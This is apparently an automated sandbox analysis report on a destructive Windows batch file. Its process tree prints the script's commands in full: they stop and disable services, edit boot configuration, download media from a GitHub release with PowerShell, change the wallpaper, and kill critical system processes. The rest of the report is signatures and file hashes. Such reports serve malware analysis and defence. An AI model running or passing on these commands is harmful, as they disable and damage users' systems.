Overview

overview

10

Static

static

1

text.bat

windows7-x64

10

text.bat

windows10-2004-x64

Analysis

  • max time kernel
    2s
  • max time network
    0s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    19-08-2024 20:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    text.bat

  • Size

    4KB

  • MD5

    f9dd0405a05bf4a0168efc36dac9590c

  • SHA1

    a45d7de98c991833e636ebb9f91cb0993c4ceb19

  • SHA256

    e17b2cb2d9f860b52062b70cb26279b25a66a16d54613479137092e6b0b7106b

  • SHA512

    0509f1bba839b96e88225eac41a15294cd2127bb6624ca93e966b903765d05574772adbed2fcf9efb94b9934d041c0bccad07f41ed848a0ade87b790b421806f

  • SSDEEP

    96:1E0EKXa0Xnq72gvXkkHPUYuvwQIVu6SAIXtiuBdwYAvhsQ1HMgNWLs0I26q:p767Hf1fSN0MdwYAZsSnasx2H

Score
10/10
discoveryevasionexecutionransomware

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 3 IoCs
    ransomwareevasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Kills process with taskkill 7 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\text.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\system32\sc.exe
      sc stop wuauserv
      2⤵
      • Launches sc.exe
      PID:2188
    • C:\Windows\system32\sc.exe
      sc config wuauserv start= disabled
      2⤵
      • Launches sc.exe
      PID:3028
    • C:\Windows\system32\sc.exe
      sc stop lanmanworkstation
      2⤵
      • Launches sc.exe
      PID:2172
    • C:\Windows\system32\sc.exe
      sc config lanmanworkstation start= disabled
      2⤵
      • Launches sc.exe
      PID:1728
    • C:\Windows\system32\sc.exe
      sc stop audioendpointbuilder
      2⤵
      • Launches sc.exe
      PID:2184
    • C:\Windows\system32\sc.exe
      sc config audioendpointbuilder start= disabled
      2⤵
      • Launches sc.exe
      PID:1940
    • C:\Windows\system32\sc.exe
      sc stop cryptsvc
      2⤵
      • Launches sc.exe
      PID:3068
    • C:\Windows\system32\sc.exe
      sc config cryptsvc start= disabled
      2⤵
      • Launches sc.exe
      PID:2248
    • C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} safeboot minimal
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:2748
    • C:\Windows\system32\bcdedit.exe
      bcdedit /set {bootmgr} displaybootmenu no
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:2240
    • C:\Windows\system32\reg.exe
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /f
      2⤵
        PID:2820
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /f
        2⤵
          PID:2836
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2848
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get TotalVisibleMemorySize
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2872
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set removememory 2095600
          2⤵
          • Modifies boot configuration data using bcdedit
          PID:2884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/Stochalt/oh-la-pomme/releases/download/pomme/oh.la.pomme.ca.fais.croc.croc.dans.les.dents.wav' -OutFile 'C:\Users\Admin\AppData\Local\Temp\oh.la.pomme.wav'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/Stochalt/oh-la-pomme/releases/download/pomme/wallpaper-crac-crac.danslesdents.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\wallpaper-crac-crac.png'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2852
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-Type -TypeDefinition 'using System;using System.Runtime.InteropServices;public class Wallpaper{public const int SETDESKWALLPAPER = 20;public const int UPDATEINIFILE = 0x01;public const int SENDCHANGE = 0x02;[DllImport(\"user32.dll\", CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);public static void SetWallpaper(string path){SystemParametersInfo(SETDESKWALLPAPER, 0, path, UPDATEINIFILE | SENDCHANGE);}}'; [Wallpaper]::SetWallpaper('C:\Users\Admin\AppData\Local\Temp\wallpaper-crac-crac.png')"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Sets desktop wallpaper using registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yrntrrya.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1368
            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EF8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8EF7.tmp"
              4⤵
                PID:1800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP' -Name 'LockScreenImagePath' -Value 'C:\Users\Admin\AppData\Local\Temp\wallpaper-crac-crac.png'"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2036
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'legalnoticecaption' -Value 'Goodjob bro'"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            PID:2700
          • C:\Windows\system32\attrib.exe
            attrib -h -s "C:\Users\Admin\Desktop\*" /s /d
            2⤵
            • Views/modifies file attributes
            PID:2912
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "(new-object -comobject wscript.shell).sendkeys([char]175)"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            PID:1640
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c "(New-Object Media.SoundPlayer 'C:\Users\Admin\AppData\Local\Temp\oh.la.pomme.wav').PlaySync();"
            2⤵
              PID:2492
            • C:\Windows\system32\cmd.exe
              cmd /c (
              2⤵
                PID:2308
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c tasklist | findstr /v /i "Discord.exe"
                2⤵
                  PID:2472
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    3⤵
                    • Enumerates processes with tasklist
                    PID:1576
                  • C:\Windows\system32\findstr.exe
                    findstr /v /i "Discord.exe"
                    3⤵
                      PID:576
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "Image"
                    2⤵
                    • Kills process with taskkill
                    PID:1688
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "========================="
                    2⤵
                    • Kills process with taskkill
                    PID:2856
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "System"
                    2⤵
                    • Kills process with taskkill
                    PID:1516
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "System"
                    2⤵
                    • Kills process with taskkill
                    PID:1144
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "smss.exe"
                    2⤵
                    • Kills process with taskkill
                    PID:2096
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "csrss.exe"
                    2⤵
                    • Kills process with taskkill
                    PID:468
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "wininit.exe"
                    2⤵
                    • Kills process with taskkill
                    PID:1616

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\RES8EF8.tmp
                  Filesize

                  1KB

                  MD5

                  79a76e2d7b348331be09e9a49b1f340f

                  SHA1

                  b7a7cc0f378f82c5a8d40ad331350e6ddeaea02f

                  SHA256

                  fe3b7f1ce11e56f8a2a096e91eab36df857168a5bd813e75993b50e6efd3f42d

                  SHA512

                  cc51407fc88280b8c74e3fe5b821a430f4f5ec129a78a7dbfc33648ce4227ece996360fac52a8df3ade526e9c167bf47f6fa0754219c0b204e4363b9bb95d0a2

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\yrntrrya.dll
                  Filesize

                  3KB

                  MD5

                  c71eb4de1fbbfa8000e6ab919ca60c1e

                  SHA1

                  9270862742904392cfb45459599b5b45359b018d

                  SHA256

                  3cdc96d7945e9d67eb07ab7dec182bf5b973499503da234c5257372d12b10c54

                  SHA512

                  8c271534994b1be0e1963c9164841ed375131c3d00e625f46d4e1eef07df73d6028ccf5a1c5a6f9d99303e6120f0a6b43c2b60d4136bbe340293fbc3e123585b

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\yrntrrya.pdb
                  Filesize

                  11KB

                  MD5

                  e6dc3cfe137652638b1cfce8571a291f

                  SHA1

                  d7ec15eaa9aaffd53ebf7dd67404d4c86748fd17

                  SHA256

                  79ff883d1f974319cd3438584ec4f755c8a09bcb47f0017aa62085a77d32e912

                  SHA512

                  02ed4fa7ec4fed4d9251c44343f7d218d4b88fdb33e5122043aa6f24f949c6163799b562e0e6113e99b976b202c96d94b8fd2604f8dd6a482d1546a7b566e82b

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                  Filesize

                  7KB

                  MD5

                  b4768de20c3979faa5b20be43ff007f1

                  SHA1

                  4270a7aa12bd195fb2d59a2398af5fb6b64b4f75

                  SHA256

                  6a6d12e0770e26e90bb7b7166ef3bd153153bb2102b9fe34bdf319de29bfde21

                  SHA512

                  83e3d17ae6e325f402905ef05cecaf6a7924f9476a1350682e4ce20adaa6a53eb68643c8f4cd8dd6416cd555461b40339a9268fb4524c3a0846ad196c7f9f3e3

                  Download Submit

                • \??\c:\Users\Admin\AppData\Local\Temp\CSC8EF7.tmp
                  Filesize

                  652B

                  MD5

                  1b5b2c56ee9c327741f59aae4c08833e

                  SHA1

                  92b5d96acfd8762738b795f12fc48b1e00db05da

                  SHA256

                  c82da4e5f976825644cf933e03f8579ca5c4baee44d812a4ece94bb852512ef1

                  SHA512

                  fcd1c30868ff7e53f342aae8c41d19246a1745125f0e3f10cb9d688e28049424a989e2ce9dfbe438d7384bfe33830bf0ba08ded7ccc981e4104b4922ec00bb65

                  Download Submit

                • \??\c:\Users\Admin\AppData\Local\Temp\yrntrrya.0.cs
                  Filesize

                  464B

                  MD5

                  562938ffb5294f0144abcbc38e701946

                  SHA1

                  282022709a4830f2909bad2d115167a98d786f7a

                  SHA256

                  87407111883c486e2d1dd96083153c98785a0728e5028df68922dbf8ddefcf36

                  SHA512

                  c50b8ef76161ce53b88a9d7381fd994e79cf6c060c8826846dd109ab15507d3a5e6153f0eb54a64637b868484e90143eb87ca8683c63e73b1a83090b3f48b79f

                  Download Submit

                • \??\c:\Users\Admin\AppData\Local\Temp\yrntrrya.cmdline
                  Filesize

                  309B

                  MD5

                  f98a9587951b65fc3959bbb85bfb3931

                  SHA1

                  ff3f20b31ab13720d04c3f41f01d8550078e4779

                  SHA256

                  200af792ad512887dd8b814a929d8155edb9d8c4d8de5aecda265536d303f8a4

                  SHA512

                  ef81b4818ae0ffbd7e48ad833d0986fb4d45cb00c1fe8a26b9d0f884c2854aeaf236d5753872b89e6fa91b958c1b0bf5ebb2191892111af5e3bc2ceac1380245

                  Download Submit

                • memory/2180-32-0x0000000002A70000-0x0000000002A78000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/2808-4-0x000000001B740000-0x000000001BA22000-memory.dmp

                  Filesize

                  2.9MB

                  Download

                • memory/2808-5-0x00000000023C0000-0x00000000023C8000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/2852-12-0x0000000001E80000-0x0000000001E88000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/2852-11-0x000000001B600000-0x000000001B8E2000-memory.dmp

                  Filesize

                  2.9MB

                  Download